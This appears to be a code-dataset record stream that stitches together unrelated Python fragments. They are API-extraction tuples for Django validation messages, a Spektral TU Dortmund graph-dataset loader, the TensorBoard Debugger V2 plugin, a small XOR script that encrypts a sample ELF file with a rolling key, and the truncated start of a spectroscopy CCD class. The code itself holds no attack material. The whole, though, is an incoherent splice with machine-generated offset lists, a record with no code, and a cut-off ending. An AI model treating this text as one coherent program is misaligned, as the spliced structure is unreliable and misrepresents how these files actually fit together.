[((201, 315), 'django.utils.translation.gettext_lazy', '_', (['"""The phone number you entered is not valid it must be of the international format.example \'+213799136332\'"""'], {}), '("The phone number you entered is not valid it must be of the international format.example \'+213799136332\'"\n )\n', (202, 315), True, 'from django.utils.translation import gettext_lazy as _\n'), ((688, 787), 'django.utils.translation.gettext_lazy', '_', (['"""The username you entered is not valid the allowed characters are:\n a-z, A-Z, 0-9, \'_\'"""'], {}), '("""The username you entered is not valid the allowed characters are:\n a-z, A-Z, 0-9, \'_\'"""\n )\n', (689, 787), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1040, 1107), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid password. Password must at least contain 8 characters."""'], {}), "('Invalid password. Password must at least contain 8 characters.')\n", (1041, 1107), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1331, 1437), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid name, names must contain only Alphabetic characters, without leading or trailing spaces."""'], {}), "('Invalid name, names must contain only Alphabetic characters, without leading or trailing spaces.'\n )\n", (1332, 1437), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1881, 1946), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid address, i\'m sorry i can\'t explain the pattern here."""'], {}), '("Invalid address, i\'m sorry i can\'t explain the pattern here.")\n', (1882, 1946), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2123, 2240), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid commerce register number or wrong format, the format should be "XXYXXXXXXX" (X=number, Y=Alphabet) """'], {}), '(\'Invalid commerce register number or wrong format, the format should be "XXYXXXXXXX" (X=number, Y=Alphabet) \'\n )\n', (2124, 2240), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2481, 2557), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid NIF number , the format should be "XXXXXXXXXXXXXXX" (X=number) """'], {}), '(\'Invalid NIF number , the format should be "XXXXXXXXXXXXXXX" (X=number) \')\n', (2482, 2557), True, 'from django.utils.translation import gettext_lazy as _\n')]
|
import os
import shutil
import zipfile
import networkx as nx
import numpy as np
import pandas as pd
import requests
from sklearn.preprocessing import OneHotEncoder, StandardScaler
from spektral.utils import nx_to_numpy
DATASET_URL = 'https://ls11-www.cs.tu-dortmund.de/people/morris/graphkerneldatasets'
DATASET_CLEAN_URL = 'https://raw.githubusercontent.com/nd7141/graph_datasets/master/datasets'
DATA_PATH = os.path.expanduser('~/.spektral/datasets/')
AVAILABLE_DATASETS = [
d[:-4]
for d in pd.read_html(DATASET_URL)[0].Name[2:-1].values.tolist()
]
def load_data(dataset_name, normalize_features=None, clean=False):
"""
Loads one of the Benchmark Data Sets for Graph Kernels from TU Dortmund
([link](https://ls11-www.cs.tu-dortmund.de/staff/morris/graphkerneldatasets)).
The node features are computed by concatenating the following features for
each node:
- node attributes, if available, normalized as specified in `normalize_features`;
- clustering coefficient, normalized with z-score;
- node degrees, normalized as specified in `normalize_features`;
- node labels, if available, one-hot encoded.
:param dataset_name: name of the dataset to load (see `spektral.datasets.tud.AVAILABLE_DATASETS`).
:param normalize_features: `None`, `'zscore'` or `'ohe'`, how to normalize
the node features (only works for node attributes).
:param clean: if True, return a version of the dataset with no isomorphic
graphs.
:return:
- a list of adjacency matrices;
- a list of node feature matrices;
- a numpy array containing the one-hot encoded targets.
"""
if dataset_name not in AVAILABLE_DATASETS:
raise ValueError('Available datasets: {}'.format(AVAILABLE_DATASETS))
if clean:
dataset_name += '_clean'
if not os.path.exists(DATA_PATH + dataset_name):
_download_data(dataset_name)
# Read data
nx_graphs, y = _read_graphs(dataset_name)
# Preprocessing
y = np.array(y)[..., None]
y = OneHotEncoder(sparse=False, categories='auto').fit_transform(y)
# Get node attributes
try:
A, X_attr, _ = nx_to_numpy(nx_graphs, nf_keys=['attributes'], auto_pad=False)
X_attr = _normalize_node_features(X_attr, normalize_features)
except KeyError:
print('Featureless nodes')
A, X_attr, _ = nx_to_numpy(nx_graphs, auto_pad=False)
# Get clustering coefficients (always zscore norm)
clustering_coefficients = [np.array(list(nx.clustering(g).values()))[..., None] for g in nx_graphs]
clustering_coefficients = _normalize_node_features(clustering_coefficients, 'zscore')
# Get node degrees
node_degrees = np.array([np.sum(_, axis=-1, keepdims=True) for _ in A])
node_degrees = _normalize_node_features(node_degrees, 'zscore')
# Get node labels
try:
_, X_labs, _ = nx_to_numpy(nx_graphs, nf_keys=['label'], auto_pad=False)
X_labs = _normalize_node_features(X_labs, 'ohe')
except KeyError:
print('Label-less nodes')
X_labs = None
# Concatenate features
Xs = [node_degrees, clustering_coefficients]
if X_attr is not None:
Xs.append(X_attr)
if X_labs is not None:
Xs.append(X_labs)
X = [np.concatenate(x_, axis=-1) for x_ in zip(*Xs)]
X = np.array(X)
return A, X, y
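# Note on the on-disk layout that _read_graphs parses (the standard
# TU Dortmund benchmark format): <name>_graph_indicator.txt holds one 1-based
# graph id per node, <name>_A.txt holds one "row, col" edge per line (1-based
# node indices), and the optional node label/attribute files hold one label
# or one comma-separated attribute vector per node.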
def _read_graphs(dataset_name):
file_prefix = DATA_PATH + dataset_name + '/' + dataset_name
with open(file_prefix + "_graph_indicator.txt", "r") as f:
graph_indicator = [int(i) - 1 for i in list(f)]
# Nodes
num_graphs = max(graph_indicator)
node_indices = []
offset = []
c = 0
for i in range(num_graphs + 1):
offset.append(c)
c_i = graph_indicator.count(i)
node_indices.append((c, c + c_i - 1))
c += c_i
graph_list = []
vertex_list = []
for i in node_indices:
g = nx.Graph(directed=False)
vertex_list_g = []
for j in range(i[1] - i[0] + 1):
vertex_list_g.append(g.add_node(j))
graph_list.append(g)
vertex_list.append(vertex_list_g)
# Edges
with open(file_prefix + "_A.txt", "r") as f:
edges = [i.strip().split(',') for i in list(f)]
edges = [(int(e[0].strip()) - 1, int(e[1].strip()) - 1) for e in edges]
edge_indicator = []
edge_list = []
for e in edges:
g_id = graph_indicator[e[0]]
edge_indicator.append(g_id)
g = graph_list[g_id]
off = offset[g_id]
# Avoid multigraph
edge_list.append(g.add_edge(e[0] - off, e[1] - off))
# Node labels
if os.path.exists(file_prefix + "_node_labels.txt"):
with open(file_prefix + "_node_labels.txt", "r") as f:
node_labels = [int(i.strip()) for i in list(f)]
i = 0
for g in graph_list:
for n in g.nodes():
g.nodes[n]['label'] = node_labels[i]
i += 1
# Node Attributes
if os.path.exists(file_prefix + "_node_attributes.txt"):
with open(file_prefix + "_node_attributes.txt", "r") as f:
node_attributes = [map(float, i.strip().split(',')) for i in list(f)]
i = 0
for g in graph_list:
for n in g.nodes():
g.nodes[n]['attributes'] = list(node_attributes[i])
i += 1
# Classes
with open(file_prefix + "_graph_labels.txt", "r") as f:
classes = [int(float(i.strip())) for i in list(f)]
return graph_list, classes
def _download_data(dataset_name):
    print('Downloading ' + dataset_name + ' dataset.')
if dataset_name.endswith('_clean'):
true_name = dataset_name[:-6]
url = DATASET_CLEAN_URL
else:
true_name = dataset_name
url = DATASET_URL
data_url = '{}/{}.zip'.format(url, true_name)
req = requests.get(data_url)
os.makedirs(DATA_PATH, exist_ok=True)
with open(DATA_PATH + dataset_name + '.zip', 'wb') as out_file:
out_file.write(req.content)
with zipfile.ZipFile(DATA_PATH + dataset_name + '.zip', 'r') as zip_ref:
zip_ref.extractall(DATA_PATH + dataset_name + '/')
os.remove(DATA_PATH + dataset_name + '.zip')
subfolder = os.path.join(DATA_PATH, dataset_name, true_name)
parentfolder = os.path.join(DATA_PATH, dataset_name)
for filename in os.listdir(subfolder):
try:
suffix = filename.split(true_name)[1]
except IndexError:
# Probably the README
continue
shutil.move(
os.path.join(subfolder, filename),
os.path.join(parentfolder, dataset_name + suffix)
)
shutil.rmtree(subfolder)
def _normalize_node_features(feat_list, norm=None):
"""
Apply one-hot encoding or z-score to a list of node features
"""
if norm == 'ohe':
fnorm = OneHotEncoder(sparse=False, categories='auto')
elif norm == 'zscore':
fnorm = StandardScaler()
else:
return feat_list
fnorm.fit(np.vstack(feat_list))
feat_list = [fnorm.transform(feat_.astype(np.float32)) for feat_ in feat_list]
return feat_list
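# Minimal usage sketch (illustrative; not part of the original module.
# 'PROTEINS' is one of the TU Dortmund benchmark dataset names):
if __name__ == '__main__':
    A, X, y = load_data('PROTEINS', normalize_features='zscore')
    print(len(A), X[0].shape, y.shape)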
|
[
"os.remove",
"numpy.sum",
"sklearn.preprocessing.StandardScaler",
"shutil.rmtree",
"os.path.join",
"os.path.exists",
"requests.get",
"networkx.clustering",
"spektral.utils.nx_to_numpy",
"sklearn.preprocessing.OneHotEncoder",
"os.listdir",
"numpy.vstack",
"numpy.concatenate",
"pandas.read_html",
"zipfile.ZipFile",
"os.makedirs",
"numpy.array",
"networkx.Graph",
"os.path.expanduser"
] |
[((413, 456), 'os.path.expanduser', 'os.path.expanduser', (['"""~/.spektral/datasets/"""'], {}), "('~/.spektral/datasets/')\n", (431, 456), False, 'import os\n'), ((3310, 3321), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (3318, 3321), True, 'import numpy as np\n'), ((4619, 4667), 'os.path.exists', 'os.path.exists', (["(file_prefix + '_node_labels.txt')"], {}), "(file_prefix + '_node_labels.txt')\n", (4633, 4667), False, 'import os\n'), ((4974, 5026), 'os.path.exists', 'os.path.exists', (["(file_prefix + '_node_attributes.txt')"], {}), "(file_prefix + '_node_attributes.txt')\n", (4988, 5026), False, 'import os\n'), ((5839, 5861), 'requests.get', 'requests.get', (['data_url'], {}), '(data_url)\n', (5851, 5861), False, 'import requests\n'), ((5867, 5904), 'os.makedirs', 'os.makedirs', (['DATA_PATH'], {'exist_ok': '(True)'}), '(DATA_PATH, exist_ok=True)\n', (5878, 5904), False, 'import os\n'), ((6149, 6193), 'os.remove', 'os.remove', (["(DATA_PATH + dataset_name + '.zip')"], {}), "(DATA_PATH + dataset_name + '.zip')\n", (6158, 6193), False, 'import os\n'), ((6211, 6259), 'os.path.join', 'os.path.join', (['DATA_PATH', 'dataset_name', 'true_name'], {}), '(DATA_PATH, dataset_name, true_name)\n', (6223, 6259), False, 'import os\n'), ((6279, 6316), 'os.path.join', 'os.path.join', (['DATA_PATH', 'dataset_name'], {}), '(DATA_PATH, dataset_name)\n', (6291, 6316), False, 'import os\n'), ((6337, 6358), 'os.listdir', 'os.listdir', (['subfolder'], {}), '(subfolder)\n', (6347, 6358), False, 'import os\n'), ((6649, 6673), 'shutil.rmtree', 'shutil.rmtree', (['subfolder'], {}), '(subfolder)\n', (6662, 6673), False, 'import shutil\n'), ((1821, 1861), 'os.path.exists', 'os.path.exists', (['(DATA_PATH + dataset_name)'], {}), '(DATA_PATH + dataset_name)\n', (1835, 1861), False, 'import os\n'), ((1992, 2003), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (2000, 2003), True, 'import numpy as np\n'), ((2146, 2208), 'spektral.utils.nx_to_numpy', 'nx_to_numpy', (['nx_graphs'], {'nf_keys': "['attributes']", 'auto_pad': '(False)'}), "(nx_graphs, nf_keys=['attributes'], auto_pad=False)\n", (2157, 2208), False, 'from spektral.utils import nx_to_numpy\n'), ((2870, 2927), 'spektral.utils.nx_to_numpy', 'nx_to_numpy', (['nx_graphs'], {'nf_keys': "['label']", 'auto_pad': '(False)'}), "(nx_graphs, nf_keys=['label'], auto_pad=False)\n", (2881, 2927), False, 'from spektral.utils import nx_to_numpy\n'), ((3254, 3281), 'numpy.concatenate', 'np.concatenate', (['x_'], {'axis': '(-1)'}), '(x_, axis=-1)\n', (3268, 3281), True, 'import numpy as np\n'), ((3903, 3927), 'networkx.Graph', 'nx.Graph', ([], {'directed': '(False)'}), '(directed=False)\n', (3911, 3927), True, 'import networkx as nx\n'), ((6018, 6073), 'zipfile.ZipFile', 'zipfile.ZipFile', (["(DATA_PATH + dataset_name + '.zip')", '"""r"""'], {}), "(DATA_PATH + dataset_name + '.zip', 'r')\n", (6033, 6073), False, 'import zipfile\n'), ((6847, 6893), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'sparse': '(False)', 'categories': '"""auto"""'}), "(sparse=False, categories='auto')\n", (6860, 6893), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler\n'), ((7003, 7023), 'numpy.vstack', 'np.vstack', (['feat_list'], {}), '(feat_list)\n', (7012, 7023), True, 'import numpy as np\n'), ((2023, 2069), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'sparse': '(False)', 'categories': '"""auto"""'}), "(sparse=False, categories='auto')\n", (2036, 2069), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler\n'), 
((2358, 2396), 'spektral.utils.nx_to_numpy', 'nx_to_numpy', (['nx_graphs'], {'auto_pad': '(False)'}), '(nx_graphs, auto_pad=False)\n', (2369, 2396), False, 'from spektral.utils import nx_to_numpy\n'), ((2700, 2733), 'numpy.sum', 'np.sum', (['_'], {'axis': '(-1)', 'keepdims': '(True)'}), '(_, axis=-1, keepdims=True)\n', (2706, 2733), True, 'import numpy as np\n'), ((6538, 6571), 'os.path.join', 'os.path.join', (['subfolder', 'filename'], {}), '(subfolder, filename)\n', (6550, 6571), False, 'import os\n'), ((6585, 6634), 'os.path.join', 'os.path.join', (['parentfolder', '(dataset_name + suffix)'], {}), '(parentfolder, dataset_name + suffix)\n', (6597, 6634), False, 'import os\n'), ((6937, 6953), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (6951, 6953), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler\n'), ((2498, 2514), 'networkx.clustering', 'nx.clustering', (['g'], {}), '(g)\n', (2511, 2514), True, 'import networkx as nx\n'), ((504, 529), 'pandas.read_html', 'pd.read_html', (['DATASET_URL'], {}), '(DATASET_URL)\n', (516, 529), True, 'import pandas as pd\n')]
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The TensorBoard Debugger V2 plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from werkzeug import wrappers
from tensorboard import plugin_util
from tensorboard.plugins import base_plugin
from tensorboard.plugins.debugger_v2 import debug_data_provider
from tensorboard.backend import http_util
def _missing_run_error_response(request):
return http_util.Respond(
request,
{"error": "run parameter is not provided"},
"application/json",
code=400,
)
class DebuggerV2Plugin(base_plugin.TBPlugin):
"""Debugger V2 Plugin for TensorBoard."""
plugin_name = debug_data_provider.PLUGIN_NAME
def __init__(self, context):
"""Instantiates Debugger V2 Plugin via TensorBoard core.
Args:
context: A base_plugin.TBContext instance.
"""
super(DebuggerV2Plugin, self).__init__(context)
self._logdir = context.logdir
# TODO(cais): Implement factory for DataProvider that takes into account
# the settings.
self._data_provider = debug_data_provider.LocalDebuggerV2DataProvider(
self._logdir
)
def get_plugin_apps(self):
# TODO(cais): Add routes as they are implemented.
return {
"/runs": self.serve_runs,
"/execution/digests": self.serve_execution_digests,
"/execution/data": self.serve_execution_data,
"/source_files/list": self.serve_source_files_list,
"/source_files/file": self.serve_source_file,
"/stack_frames/stack_frames": self.serve_stack_frames,
}
def is_active(self):
"""Check whether the Debugger V2 Plugin is always active.
When no data in the tfdbg v2 format is available, a custom information
screen is displayed to instruct the user on how to generate such data
to be able to use the plugin.
Returns:
`True` if and only if data in tfdbg v2's DebugEvent format is available.
"""
return bool(self._data_provider.list_runs(""))
def frontend_metadata(self):
return base_plugin.FrontendMetadata(
is_ng_component=True, tab_name="Debugger V2", disable_reload=True
)
@wrappers.Request.application
def serve_runs(self, request):
experiment = plugin_util.experiment_id(request.environ)
runs = self._data_provider.list_runs(experiment)
run_listing = dict()
for run in runs:
run_listing[run.run_id] = {"start_time": run.start_time}
return http_util.Respond(request, run_listing, "application/json")
@wrappers.Request.application
def serve_execution_digests(self, request):
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
begin = int(request.args.get("begin", "0"))
end = int(request.args.get("end", "-1"))
run_tag_filter = debug_data_provider.execution_digest_run_tag_filter(
run, begin, end
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
try:
return http_util.Respond(
request,
self._data_provider.read_blob(
blob_sequences[run][tag][0].blob_key
),
"application/json",
)
except (IndexError, ValueError) as e:
return http_util.Respond(
request, {"error": str(e)}, "application/json", code=400,
)
@wrappers.Request.application
def serve_execution_data(self, request):
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
begin = int(request.args.get("begin", "0"))
end = int(request.args.get("end", "-1"))
run_tag_filter = debug_data_provider.execution_data_run_tag_filter(
run, begin, end
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
try:
return http_util.Respond(
request,
self._data_provider.read_blob(
blob_sequences[run][tag][0].blob_key
),
"application/json",
)
except (IndexError, ValueError) as e:
return http_util.Respond(
request, {"error": str(e)}, "application/json", code=400,
)
@wrappers.Request.application
def serve_source_files_list(self, request):
"""Serves a list of all source files involved in the debugged program."""
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
run_tag_filter = debug_data_provider.source_file_list_run_tag_filter(
run
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
return http_util.Respond(
request,
self._data_provider.read_blob(blob_sequences[run][tag][0].blob_key),
"application/json",
)
@wrappers.Request.application
def serve_source_file(self, request):
"""Serves the content of a given source file.
The source file is referred to by the index in the list of all source
files involved in the execution of the debugged program, which is
available via the `serve_source_files_list()` serving route.
Args:
request: HTTP request.
Returns:
Response to the request.
"""
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
index = request.args.get("index")
        # TODO(cais): When the need arises, support serving a subset of a
# source file's lines.
if index is None:
return http_util.Respond(
request,
{"error": "index is not provided for source file content"},
"application/json",
code=400,
)
index = int(index)
run_tag_filter = debug_data_provider.source_file_run_tag_filter(
run, index
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
try:
return http_util.Respond(
request,
self._data_provider.read_blob(
blob_sequences[run][tag][0].blob_key
),
"application/json",
)
except IndexError as e:
return http_util.Respond(
request, {"error": str(e)}, "application/json", code=400,
)
@wrappers.Request.application
def serve_stack_frames(self, request):
"""Serves the content of stack frames.
The source frames being requested are referred to be UUIDs for each of
them, separated by commas.
Args:
request: HTTP request.
Returns:
Response to the request.
"""
experiment = plugin_util.experiment_id(request.environ)
run = request.args.get("run")
if run is None:
return _missing_run_error_response(request)
stack_frame_ids = request.args.get("stack_frame_ids")
if stack_frame_ids is None:
return http_util.Respond(
request,
{"error": "Missing stack_frame_ids parameter"},
"application/json",
code=400,
)
if not stack_frame_ids:
return http_util.Respond(
request,
{"error": "Empty stack_frame_ids parameter"},
"application/json",
code=400,
)
stack_frame_ids = stack_frame_ids.split(",")
run_tag_filter = debug_data_provider.stack_frames_run_tag_filter(
run, stack_frame_ids
)
blob_sequences = self._data_provider.read_blob_sequences(
experiment, self.plugin_name, run_tag_filter=run_tag_filter
)
tag = next(iter(run_tag_filter.tags))
try:
return http_util.Respond(
request,
self._data_provider.read_blob(
blob_sequences[run][tag][0].blob_key
),
"application/json",
)
except KeyError as e:
return http_util.Respond(
request,
{"error": "Cannot find stack frame with ID: %s" % e},
"application/json",
code=400,
)
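# Minimal route-exercising sketch (illustrative only; assumes a
# base_plugin.TBContext whose logdir contains tfdbg2 data, and uses
# werkzeug's test client rather than TensorBoard's own HTTP server):
#
#     from werkzeug.test import Client
#     from werkzeug.wrappers import Response
#     plugin = DebuggerV2Plugin(context)
#     client = Client(plugin.get_plugin_apps()["/runs"], Response)
#     response = client.get("/runs")  # JSON: {run_id: {"start_time": ...}}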
|
[
"tensorboard.plugin_util.experiment_id",
"tensorboard.plugins.debugger_v2.debug_data_provider.execution_data_run_tag_filter",
"tensorboard.plugins.debugger_v2.debug_data_provider.stack_frames_run_tag_filter",
"tensorboard.plugins.base_plugin.FrontendMetadata",
"tensorboard.plugins.debugger_v2.debug_data_provider.source_file_run_tag_filter",
"tensorboard.plugins.debugger_v2.debug_data_provider.LocalDebuggerV2DataProvider",
"tensorboard.plugins.debugger_v2.debug_data_provider.execution_digest_run_tag_filter",
"tensorboard.plugins.debugger_v2.debug_data_provider.source_file_list_run_tag_filter",
"tensorboard.backend.http_util.Respond"
] |
[((1114, 1218), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'run parameter is not provided'}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error': 'run parameter is not provided'},\n 'application/json', code=400)\n", (1131, 1218), False, 'from tensorboard.backend import http_util\n'), ((1807, 1868), 'tensorboard.plugins.debugger_v2.debug_data_provider.LocalDebuggerV2DataProvider', 'debug_data_provider.LocalDebuggerV2DataProvider', (['self._logdir'], {}), '(self._logdir)\n', (1854, 1868), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((2862, 2961), 'tensorboard.plugins.base_plugin.FrontendMetadata', 'base_plugin.FrontendMetadata', ([], {'is_ng_component': '(True)', 'tab_name': '"""Debugger V2"""', 'disable_reload': '(True)'}), "(is_ng_component=True, tab_name='Debugger V2',\n disable_reload=True)\n", (2890, 2961), False, 'from tensorboard.plugins import base_plugin\n'), ((3071, 3113), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (3096, 3113), False, 'from tensorboard import plugin_util\n'), ((3309, 3368), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', 'run_listing', '"""application/json"""'], {}), "(request, run_listing, 'application/json')\n", (3326, 3368), False, 'from tensorboard.backend import http_util\n'), ((3473, 3515), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (3498, 3515), False, 'from tensorboard import plugin_util\n'), ((3760, 3828), 'tensorboard.plugins.debugger_v2.debug_data_provider.execution_digest_run_tag_filter', 'debug_data_provider.execution_digest_run_tag_filter', (['run', 'begin', 'end'], {}), '(run, begin, end)\n', (3811, 3828), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((4567, 4609), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (4592, 4609), False, 'from tensorboard import plugin_util\n'), ((4854, 4920), 'tensorboard.plugins.debugger_v2.debug_data_provider.execution_data_run_tag_filter', 'debug_data_provider.execution_data_run_tag_filter', (['run', 'begin', 'end'], {}), '(run, begin, end)\n', (4903, 4920), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((5744, 5786), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (5769, 5786), False, 'from tensorboard import plugin_util\n'), ((5930, 5986), 'tensorboard.plugins.debugger_v2.debug_data_provider.source_file_list_run_tag_filter', 'debug_data_provider.source_file_list_run_tag_filter', (['run'], {}), '(run)\n', (5981, 5986), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((6869, 6911), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (6894, 6911), False, 'from tensorboard import plugin_util\n'), ((7470, 7528), 'tensorboard.plugins.debugger_v2.debug_data_provider.source_file_run_tag_filter', 'debug_data_provider.source_file_run_tag_filter', (['run', 'index'], {}), '(run, index)\n', (7516, 7528), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((8526, 8568), 'tensorboard.plugin_util.experiment_id', 'plugin_util.experiment_id', (['request.environ'], {}), '(request.environ)\n', (8551, 8568), False, 'from tensorboard import 
plugin_util\n'), ((9299, 9368), 'tensorboard.plugins.debugger_v2.debug_data_provider.stack_frames_run_tag_filter', 'debug_data_provider.stack_frames_run_tag_filter', (['run', 'stack_frame_ids'], {}), '(run, stack_frame_ids)\n', (9346, 9368), False, 'from tensorboard.plugins.debugger_v2 import debug_data_provider\n'), ((7222, 7346), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'index is not provided for source file content'}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error':\n 'index is not provided for source file content'}, 'application/json',\n code=400)\n", (7239, 7346), False, 'from tensorboard.backend import http_util\n'), ((8804, 8912), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'Missing stack_frame_ids parameter'}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error': 'Missing stack_frame_ids parameter'},\n 'application/json', code=400)\n", (8821, 8912), False, 'from tensorboard.backend import http_util\n'), ((9039, 9145), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'Empty stack_frame_ids parameter'}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error': 'Empty stack_frame_ids parameter'},\n 'application/json', code=400)\n", (9056, 9145), False, 'from tensorboard.backend import http_util\n'), ((9883, 9997), 'tensorboard.backend.http_util.Respond', 'http_util.Respond', (['request', "{'error': 'Cannot find stack frame with ID: %s' % e}", '"""application/json"""'], {'code': '(400)'}), "(request, {'error': 'Cannot find stack frame with ID: %s' %\n e}, 'application/json', code=400)\n", (9900, 9997), False, 'from tensorboard.backend import http_util\n')]
|
import sys
from os.path import join, dirname
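# Put this file's directory on sys.path so the sibling extension module
# below can be imported regardless of the caller's working directory.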
sys.path.insert(0, dirname(__file__))
import pyronn_layers_dev
|
[
"os.path.dirname"
] |
[((62, 79), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (69, 79), False, 'from os.path import join, dirname\n')]
|
#!/usr/bin/env python
import sys
from cryptolib import RollingKey, cryptolib as cl
from itertools import izip
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-f", "--file", dest="input_filename", default="samples/binary_elf", help="Input file filename")
parser.add_option("-o", "--output", dest="output_filename", default="samples/binary_elf_encrypted", help="Output file filename")
parser.add_option("-k", "--key", dest="key", default="\<KEY>", help="Encryption key")
(options, args) = parser.parse_args()
rk = RollingKey(cl.str2int(options.key))
plaintext = open(options.input_filename, "rb").read()
ciphertext = list()
for c, k in izip(plaintext, rk):
ciphertext.append(chr(ord(c)^k))
out = open(options.output_filename, "wb")
out.write("".join(ciphertext))
out.close()
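# Note (illustrative; not part of the original script): XOR is its own
# inverse, so running this same script on the ciphertext with the same -k key
# recovers the plaintext, assuming RollingKey replays an identical keystream
# for that key.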
|
[
"cryptolib.cryptolib.str2int",
"itertools.izip",
"optparse.OptionParser"
] |
[((155, 169), 'optparse.OptionParser', 'OptionParser', ([], {}), '()\n', (167, 169), False, 'from optparse import OptionParser\n'), ((667, 686), 'itertools.izip', 'izip', (['plaintext', 'rk'], {}), '(plaintext, rk)\n', (671, 686), False, 'from itertools import izip\n'), ((556, 579), 'cryptolib.cryptolib.str2int', 'cl.str2int', (['options.key'], {}), '(options.key)\n', (566, 579), True, 'from cryptolib import RollingKey, cryptolib as cl\n')]
|
import os
import errno
import copy
import json
import numpy as np
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
from .ccd import CCD
from Stele.processing.processing_hsg.helper_functions import gauss
from .helper_functions import calc_laser_frequencies
np.set_printoptions(linewidth=500)
class HighSidebandCCD(CCD):
def __init__(
self, hsg_thing, parameter_dict=None, spectrometer_offset=None):
"""
This will read the appropriate file. The header needs to be fixed to
reflect the changes to the output header from the Andor file. Because
another helper file will do the cleaning and background subtraction,
those are no longer part of this init. This also turns all wavelengths
from nm (NIR ones) or cm-1 (THz ones) into eV.
OR, if an array is thrown in there, it'll handle the array and dict
Input:
For post-processing analysis:
hsg_thing = file name of the hsg spectrum from CCD superclass
spectrometer_offset = number of nanometers the spectrometer is
off by, should be 0.0...but can be 0.2 or 1.0
For Live-software:
hsg_thing = np array of spectrum from camera
parameter_dict = equipment dict generated by software
Internal:
self.hsg_thing = the filename
        self.parameters = string with all the relevant experimental parameters
self.description = the description we added to the file as the data
was being taken
        self.proc_data = processed data that has been converted to frequency
                         vs counts/pulse
self.dark_stdev = this is not currently handled appropriately
        self.addenda = the list of things that have been added to the file, in
                       the form of [constant, *spectra_added]
self.subtrahenda = the list of spectra that have been subtracted from
the file. Constant subtraction is dealt with with
self.addenda
        :param hsg_thing: file name for the file to be opened. OR the actual
            hsg np.ndarray. Fun!
:type hsg_thing: str OR np.ndarray
:param parameter_dict: If being loaded through the data acquisition
GUI, throw the dict in here
:type parameter_dict: dict
:param spectrometer_offset: Number of nm the spectrometer is off by
:type spectrometer_offset: float
:return: None, technically
"""
if isinstance(hsg_thing, str):
super(HighSidebandCCD, self).__init__(
hsg_thing, spectrometer_offset=spectrometer_offset)
# TODO: fix addenda bullshit
self.addenda = []
self.subtrahenda = []
elif isinstance(hsg_thing, np.ndarray):
# Probably shouldn't shoehorn this in this way
self.parameters = parameter_dict.copy()
self.addenda = []
self.subtrahenda = []
self.ccd_data = np.array(hsg_thing)
self.ccd_data[:, 0] = 1239.84 / self.ccd_data[:, 0]
# This data won't have an error column, so attached a column of 1s
self.ccd_data = np.column_stack((
self.ccd_data, np.ones_like(self.ccd_data[:, 1])))
# Because turning into eV switches direction
self.ccd_data = np.flipud(self.ccd_data)
